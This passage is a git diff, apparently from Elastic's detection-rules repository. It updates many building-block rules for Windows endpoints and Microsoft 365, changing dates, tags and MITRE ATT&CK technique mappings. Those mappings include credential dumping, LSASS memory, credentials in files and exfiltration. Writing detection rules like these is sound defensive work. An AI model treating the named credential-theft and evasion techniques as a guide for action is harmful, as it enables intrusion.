[[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml index 5742ea8c024..b67d9497997 100644 --- a/rules_building_block/collection_common_compressed_archived_file.toml +++ b/rules_building_block/collection_common_compressed_archived_file.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = "endpoint" maturity = "production" -updated_date = "2025/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,58 +76,13 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1132" -name = "Data Encoding" -reference = "https://attack.mitre.org/techniques/T1132/" -[[rule.threat.technique.subtechnique]] -id = "T1132.001" -name = "Standard Encoding" -reference = "https://attack.mitre.org/techniques/T1132/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml index bfc6b8ca0b3..b824d6ba8a3 100644 --- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml +++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,13 +56,34 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml index 20d080f5445..ecf0303733a 100644 --- a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml +++ b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,24 +53,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 621b225c547..9ef72645996 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -207,34 +207,26 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 3952b06069b..07bb5150945 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,17 +26,7 @@ name = "Bitsadmin Activity" risk_score = 21 rule_id = "8eec4df1-4b4b-4502-b6c3-c788714604c9" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -57,38 +47,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index 5701fe075a7..f135e42a29f 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml +++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,18 +26,7 @@ references = [ risk_score = 21 rule_id = "e9a3b2c1-d4f5-6789-0abc-def123456789" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Domain: LLM", - "Mitre Atlas: T0010.003", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Initial Access", "Data Source: Elastic Defend", "Domain: LLM", "Mitre Atlas: T0010.003", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -56,31 +45,49 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0012" +name = "Valid Accounts" +reference = "https://atlas.mitre.org/techniques/AML.T0012/" + +[rule.threat.tactic] +id = "AML.TA0004" +name = "Initial Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0004/" diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 74f8692331c..9ec279e6d2c 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -31,19 +31,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Protection", - "Use Case: Threat Detection", - "Use Case: Identity Threat Detection", - "Tactic: Credential Access", - "Tactic: Initial Access", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Use Case: Threat Detection", "Use Case: Identity Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -54,29 +42,17 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 6eb634e33de..2981a5ea562 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml +++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml index 666c28d4f06..bef39605f7d 100644 --- a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml +++ b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/09/21" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Memory Dump File with Unusual Extension" risk_score = 21 rule_id = "c0b9dc99-c696-4779-b086-0d37dc2b3778" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -52,36 +44,18 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.008" name = "Masquerade File Type" reference = "https://attack.mitre.org/techniques/T1036/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 87e086c3d31..9c6d6a93c4a 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,24 +83,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 79332fc5371..62320b4e83b 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -40,24 +40,18 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" [[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 0e65e8b4c34..79afd7ac201 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -24,14 +24,7 @@ references = [ risk_score = 21 rule_id = "8d366588-cbd6-43ba-95b4-0971c3f906e5" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -61,36 +54,18 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index 2eecbdb9c35..b530926ee0b 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,26 +78,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index 845c9e5546e..b06cf6f55fc 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,19 +52,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" - +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 6d1c96172e8..563b76b541a 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ name = "Potential Process Injection from Malicious Document" risk_score = 21 rule_id = "1c5a04ae-d034-41bf-b0d8-96439b5cc774" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Tactic: Initial Access", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -52,43 +43,23 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_masquerading_browsers.toml b/rules_building_block/defense_evasion_masquerading_browsers.toml index cb67a25bd91..c86c12b0ea8 100644 --- a/rules_building_block/defense_evasion_masquerading_browsers.toml +++ b/rules_building_block/defense_evasion_masquerading_browsers.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as Browser Process" risk_score = 21 rule_id = "5b9eb30f-87d6-45f4-9289-2bf2024f0376" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -169,10 +161,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -183,22 +177,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml index a05035ab822..9afa0bc4d07 100644 --- a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/09" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as VLC DLL" risk_score = 21 rule_id = "4494c14f-5ff8-4ed2-8e99-bf816a1642fc" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -45,10 +37,12 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -59,22 +53,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index afce0c6f8cd..d237951b5e4 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as System32 DLL" risk_score = 21 rule_id = "fb01d790-9f74-4e76-97dd-b4b0f7bf6435" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", 